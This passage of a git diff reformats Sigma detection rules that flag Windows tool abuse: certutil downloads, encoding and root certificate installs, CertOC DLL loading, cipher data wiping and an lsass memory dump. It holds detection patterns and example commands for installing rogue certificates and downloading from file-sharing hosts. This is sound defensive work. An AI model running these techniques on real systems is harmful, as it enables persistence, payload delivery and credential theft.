--remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc + CommandLine|contains: ' --remote-debugging-' selection_firefox: Image|endswith: \firefox.exe - CommandLine|contains: ' -start-debugger-server' + CommandLine|contains: ' -start-debugger-server' condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml index bb8f456d0..a9d5ddb73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml @@ -1,11 +1,8 @@ title: Suspicious Calculator Usage id: 737e618a-a410-49b5-bec3-9e55ff7fbc15 status: test -description: 'Detects suspicious use of ''calc.exe'' with command line parameters - or in a suspicious directory, which is likely caused by some PoC or detection - evasion. - - ' +description: | + Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. references: - https://twitter.com/ItsReallyNick/status/1094080242686312448 author: Florian Roth (Nextron Systems) @@ -23,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: '\calc.exe ' + CommandLine|contains: '\calc.exe ' selection_2: Image|endswith: \calc.exe filter_main_known_locations: @@ -31,8 +28,7 @@ detection: - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations - )) + condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations )) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml b/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml index 10df15e1d..212318b6c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml @@ -1,18 +1,14 @@ title: New Root Certificate Installed Via CertMgr.EXE id: ff992eac-6449-4c60-8c1d-91c9722a1d48 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certmgr" with the "add" flag in order to install - a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md - https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ @@ -26,19 +22,19 @@ logsource: category: process_creation product: windows detection: + # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \CertMgr.exe - - OriginalFileName: CERTMGT.EXE + - Image|endswith: \CertMgr.exe + - OriginalFileName: CERTMGT.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /add - root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml index bb0b78f2f..cf3bb6268 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_download.yml @@ -1,8 +1,8 @@ title: File Download via CertOC.EXE id: 70ad0861-d1fe-491c-a45f-fa48148a300d related: - - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a - type: similar + - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a + type: similar status: test description: Detects when a user downloads a file by using CertOC.exe references: @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -GetCACAPS - http condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml index 019b3df61..d7a1e1f67 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml @@ -1,8 +1,8 @@ title: File Download From IP Based URL Via CertOC.EXE id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a related: - - id: 70ad0861-d1fe-491c-a45f-fa48148a300d - type: similar + - id: 70ad0861-d1fe-491c-a45f-fa48148a300d + type: similar status: experimental description: Detects when a user downloads a file from an IP based URL using CertOC.exe references: @@ -22,12 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_cli: - CommandLine|contains: -GetCACAPS + CommandLine|contains: -GetCACAPS condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml index 2b6a9668c..bd67b8f02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml @@ -1,11 +1,10 @@ title: DLL Loaded via CertOC.EXE id: 242301bc-f92f-4476-8718-78004a6efd9f related: - - id: 84232095-ecca-4015-b0d7-7726507ee793 - type: similar + - id: 84232095-ecca-4015-b0d7-7726507ee793 + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to loads - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml index c6b67d63f..08109be71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml @@ -1,11 +1,10 @@ title: Suspicious DLL Loaded via CertOC.EXE id: 84232095-ecca-4015-b0d7-7726507ee793 related: - - id: 242301bc-f92f-4476-8718-78004a6efd9f - type: similar + - id: 242301bc-f92f-4476-8718-78004a6efd9f + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to load - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -24,14 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - Image|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' selection_paths: - CommandLine|contains: + CommandLine|contains: - \Appdata\Local\Temp\ - \Desktop\ - \Downloads\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml index 1b050ce96..c5e432acc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml @@ -1,18 +1,14 @@ title: New Root Certificate Installed Via Certutil.EXE id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certutil" with the "addstore" flag in order to - install a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -25,21 +21,21 @@ logsource: category: process_creation product: windows detection: + # Example: certutil -addstore -f -user ROOT CertificateFileName.der process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli_add: - CommandLine|contains: + CommandLine|contains: - /addstore - -addstore selection_cli_store: - CommandLine|contains: root + CommandLine|contains: root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml index 29d399d8f..bfadd314c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_decode.yml @@ -1,9 +1,7 @@ title: File Decoded From Base64/Hex Via Certutil.EXE id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 status: test -description: Detects the execution of certutil with either the "decode" or "decodehex" - flags to decode base64 or hex encoded files. This can be abused by attackers to - decode an encoded payload before execution +description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ @@ -25,12 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Decode Base64 - '-decode ' - '/decode ' + # Decode Hex - '-decodehex ' - '/decodehex ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml index 61e1d2c51..055fa7fac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_download.yml @@ -1,19 +1,17 @@ title: Suspicious Download Via Certutil.EXE id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b related: - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files. +description: Detects the execution of certutil with certain flags that allow the utility to download files. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ - https://twitter.com/egre55/status/1087685529016193025 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 tags: - attack.defense_evasion @@ -27,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml index 30d145a1e..b21069978 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml @@ -1,13 +1,12 @@ title: Suspicious File Downloaded From Direct IP Via Certutil.EXE id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files from direct IPs. +description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ @@ -29,14 +28,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -46,8 +45,31 @@ detection: - ://7 - ://8 - ://9 + # filter_local_ips: + # # Note: Uncomment this filter if you want to exclude local IPs + # CommandLine|contains: + # - '://10.' # 10.0.0.0/8 + # - '://192.168.' # 192.168.0.0/16 + # - '://172.16.' # 172.16.0.0/12 + # - '://172.17.' + # - '://172.18.' + # - '://172.19.' + # - '://172.20.' + # - '://172.21.' + # - '://172.22.' + # - '://172.23.' + # - '://172.24.' + # - '://172.25.' + # - '://172.26.' + # - '://172.27.' + # - '://172.28.' + # - '://172.29.' + # - '://172.30.' + # - '://172.31.' + # - '://127.' # 127.0.0.0/8 + # - '://169.254.' # 169.254.0.0/16 filter_main_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml index 89e841296..819ea76ee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml @@ -1,13 +1,12 @@ title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download + type: similar status: experimental -description: Detects the execution of certutil with certain flags that allow the utility - to download files from file-sharing websites. +description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ @@ -29,15 +28,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml index d6acda12a..12a4e958c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode.yml @@ -1,14 +1,12 @@ title: File Encoded To Base64 Via Certutil.EXE id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a status: test -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64. This can be abused by threat actors and attackers for data exfiltration +description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/02/24 modified: 2023/02/15 tags: @@ -23,15 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode condition: process_creation and (all of selection_*) falsepositives: - - As this is a general purpose rule, legitimate usage of the encode functionality - will trigger some false positives. Apply additional filters accordingly + - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml index d953f1c22..e8a960ac5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml @@ -1,11 +1,10 @@ title: Suspicious File Encoded To Base64 Via Certutil.EXE id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the extensions of the file is suspicious +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -25,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: - .acl - .bat - .doc diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml index 342f2fbe2..dbe5df99f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml @@ -1,11 +1,10 @@ title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the files are located in potentially suspicious locations +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -25,14 +24,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more suspicious locations to increase coverage - \AppData\Roaming\ - \Desktop\ - \Local\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml index c2fa37081..15cc19fef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml @@ -1,12 +1,10 @@ title: Certificate Exported Via Certutil.EXE id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 status: test -description: Detects the execution of the certutil with the "exportPFX" flag which - allows the utility to export certificates. +description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. references: - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 modified: 2023/02/20 tags: @@ -21,15 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-exportPFX ' - '/exportPFX ' condition: process_creation and (all of selection_*) falsepositives: - - There legitimate reasons to export certificates. Investigate the activity to - determine if it's benign + - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml index e0a7cd60c..beea6567b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -syncwithWU ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml index eb82ddc27..911267916 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml @@ -1,8 +1,7 @@ title: Console CodePage Lookup Via CHCP id: 7090adee-82e2-4269-bd59-80691e7c6338 status: experimental -description: Detects use of chcp to look up the system locale value as part of host - discovery +description: Detects use of chcp to look up the system locale value as part of host discovery references: - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp @@ -27,14 +26,13 @@ detection: - ' /r ' - ' /k ' Image|endswith: \chcp.com - CommandLine|endswith: + CommandLine|endswith: - chcp - 'chcp ' - 'chcp ' condition: process_creation and selection falsepositives: - - During Anaconda update the 'conda.exe' process will eventually execution the - 'chcp' command. + - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command. - Discord was seen using chcp to look up code pages level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml index 693db972c..12264b46f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml @@ -1,8 +1,7 @@ title: Suspicious CodePage Switch Via CHCP id: c7942406-33dd-4377-a564-0f62db0593a3 status: test -description: Detects a code page switch in command line or batch scripts to a rare - language +description: Detects a code page switch in command line or batch scripts to a rare language references: - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers - https://twitter.com/cglyer/status/1183756892952248325 @@ -22,14 +21,17 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \chcp.com - CommandLine|endswith: - - ' 936' - - ' 1258' + CommandLine|endswith: + - ' 936' # Chinese + # - ' 1256' # Arabic + - ' 1258' # Vietnamese + # - ' 855' # Russian + # - ' 866' # Russian + # - ' 864' # Arabic condition: process_creation and selection fields: - ParentCommandLine falsepositives: - - Administrative activity (adjust code pages according to your organization's - region) + - Administrative activity (adjust code pages according to your organization's region) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml b/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml index 74b3ae8bb..3d3f3af5c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml @@ -1,16 +1,10 @@ title: Deleted Data Overwritten Via Cipher.EXE id: 4b046706-5789-4673-b111-66f25fe99534 status: test -description: 'Detects usage of the "cipher" built-in utility in order to overwrite - deleted data from disk. - - Adversaries may destroy data and files on specific systems or in large numbers - on a network to interrupt availability to systems, services, and network resources. - - Data destruction is likely to render stored data irrecoverable by forensic techniques - through overwriting files or data on local and remote drives - - ' +description: | + Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. + Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. + Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive author: frack113 @@ -28,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: CIPHER.EXE - - Image|endswith: \cipher.exe + - OriginalFileName: CIPHER.EXE + - Image|endswith: \cipher.exe selection_cli: - CommandLine|contains: ' /w:' + CommandLine|contains: ' /w:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml b/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml index 48130b964..cab8622ce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml @@ -1,8 +1,7 @@ title: Process Access via TrolleyExpress Exclusion id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 status: test -description: Detects a possible process memory dump that uses the white-listed Citrix - TrolleyExpress.exe filename as a way to dump the lsass process memory +description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process 